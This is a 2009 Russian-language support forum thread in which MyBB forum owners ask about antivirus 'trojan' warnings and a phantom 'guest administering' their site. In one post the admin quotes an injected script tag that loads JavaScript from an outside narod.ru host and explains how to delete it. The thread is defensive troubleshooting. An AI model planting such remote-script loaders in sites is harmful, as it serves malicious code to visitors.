Единый форум поддержки

Информация о пользователе

Привет, Гость! Войдите или зарегистрируйтесь.


Вы здесь » Единый форум поддержки » Корзина » Проблема на форуме( вирус)


Проблема на форуме( вирус)

Сообщений 1 страница 17 из 17

1

Здравствуйте!
Все темы с  проблемами с вирусами по форумам- у вас закрыта. Если я не правильно сделал что-то при создании темы- то простите. У меня на форуме вирус. Удалила все скрипты, все надписи - которые поставила  - вирус исчез.   Второй вечер - вижу гостя который админит с настройками. И после этого снова вирус. Помогите пож-та.

0

2

Что это можит значать.
Гость  - Админит с настройками.

Отредактировано Thalia (Вт, 13 Окт 2009 20:30:29)

0

3

Thalia
Я же уже отвечал на этот вопрос кому-то... Кажется Вам...

Гость прячется где-то (посылает ЛС, админит, читает, пишет, смотрит)

0

4

Ирунчик
Объясняю популярно.
"Вирусы", как Вы называете вредоносное ПО делятся на две категории: скриптовые и файловые. Вторых на форуме быть не может, потому, что на форумы МайББ НЕЛЬЗЯ загружать файлы. Единственное исключение - графика. Но на текущий момент не существует "вирусов" с форматом, как у графических файлов.
Остаётся вариант, что за "вирус" у Вас на форуме принимается один из скриптов. Причём не обязательно поставленный Вами. Некоторые модели антивирусов понимают под "вирусом"... Рекламные баннерв МайББ. Поэтому, если Вы всё удалили из админки, а "вирусы" остались - это однозначно реклама.

Попытайтесь порыться в настройках программы-антивируса, вероятно, там можно задать исключение.

Ну и наконец, в сервисном сообщении (из которого Вы собственно и узнал, что у Вас "вирус") обычно указывается название файла и/или ссылка на него. Попытайтесь отыскать в исходном коде этот файл - тогда проблема сразу разрешится.

Отредактировано rps (Чт, 22 Окт 2009 23:06:33)

0

5

rps
Гость прячется где-то (посылает ЛС, админит, читает, пишет, смотрит)

какже этот гость можит всё это делать если форум скрыт от гостей.

0

6

Thalia написал(а):

какже этот гость можит всё это делать если форум скрыт от гостей.

Это бот поисковик, не обращайте внимания.

+1

7

Thalia
Чего Вы панику разводите? Ну сидит поисковый бот там, Бог с ним... Он Вам не мешает.

0

8

rps
Чего Вы панику разводите? Ну сидит поисковый бот там, Бог с ним... Он Вам не мешает.

он мне не мешает.Это не на моём форуме,а на форуме у Ирунчик у неё проблемы с этим гостем.

0

9

Thalia написал(а):

у неё проблемы с этим гостем

Какие проблемы? Вот с этого и надо было начинать...

0

10

Скажите, этот скрипт только у меня на форуме появляется или это баннеры такие? Потому, что время от времени некоторые антивирусники начинают пищать и кричать, что на форуме троян. Вот такой скришот сделал один из пользователей

0

11

forum_ALLA написал(а):

Скажите, этот скрипт только у меня на форуме появляется или это баннеры такие?

читаем..

rps написал(а):

Объясняю популярно.
"Вирусы", как Вы называете вредоносное ПО делятся на две категории: скриптовые и файловые. Вторых на форуме быть не может, потому, что на форумы МайББ НЕЛЬЗЯ загружать файлы. Единственное исключение - графика. Но на текущий момент не существует "вирусов" с форматом, как у графических файлов.
Остаётся вариант, что за "вирус" у Вас на форуме принимается один из скриптов. Причём не обязательно поставленный Вами. Некоторые модели антивирусов понимают под "вирусом"... Рекламные баннерв МайББ. Поэтому, если Вы всё удалили из админки, а "вирусы" остались - это однозначно реклама.
Попытайтесь порвться в настройках программы-антивируса, вероятно, там можно задать исключение.
Ну и наконец, в сервисном сообщении (из которого Вы собственно и узнал, что у Вас "вирус") обычно указывается название файла и/или ссылка на него. Попытайтесь отыскать в исходном коде этот файл - тогда проблема сразу разрешится.

0

12

Thalia написал(а):

Гость прячется где-то (посылает ЛС, админит, читает, пишет, смотрит)
какже этот гость можит всё это делать если форум скрыт от гостей.

Это ссылка на сайт где-то стоит или в подписе, или она ведет на картинку с того сайта, но к сервису мубб отношения не имеет.
Так что  несколько вариантов.
Найти где она есть ссылка на вашем форуме?
Если опасаетесь ,есть цензура на форуме.
А Аваст - заткнуть кляпом и работать дальше.

Админ в свое время пояснил данное так:forum_ALLA

Это когда гость берет и в браузере заходит по адресу http://forum.mybb.ru/admin_index.php  вот тогда вам и высвечивается, гость админит или пользователь.

Но это не правда, так как гость не может админить, как и пользователь и ему отображается страничка запрета.

Отредактировано Lexx (Ср, 21 Окт 2009 21:13:01)

0

13

forum_ALLA написал(а):

Скажите, этот скрипт только у меня на форуме появляется или это баннеры такие? Потому, что время от времени некоторые антивирусники начинают пищать и кричать, что на форуме троян. Вот такой скришот сделал один из пользователей

Зайдите в "Администрирование" » "Форумы". Далее "редактировать" напротив форума с названием "Поиск файлов". В текстовом поле "Описание (HTML)" в самом низу найдите и удалите строчку:

Код:
<script language=javascript src="http://www.aab51.narod.ru/000001.js"></script>

Чтобы подобного не повторялось, все администраторы форума (если их больше одного) должны проверить свой компьютер на вирусы.

+1

14

Admin написал(а):

Зайдите в "Администрирование" » "Форумы". Далее "редактировать" напротив форума с названием "Поиск файлов". В текстовом поле "Описание (HTML)" в самом низу найдите и удалите строчку:

не нашла форум с названием "Поиск файлов"

0

15

Глючная авишка
Это находится в форуме "Будущая мама", Админ наверное ошибся...

-1

16

rps, спасибо ) удалила. будем смотреть )

0

17

Admin,

мерси боку, буду бдить.

0


Вы здесь » Единый форум поддержки » Корзина » Проблема на форуме( вирус)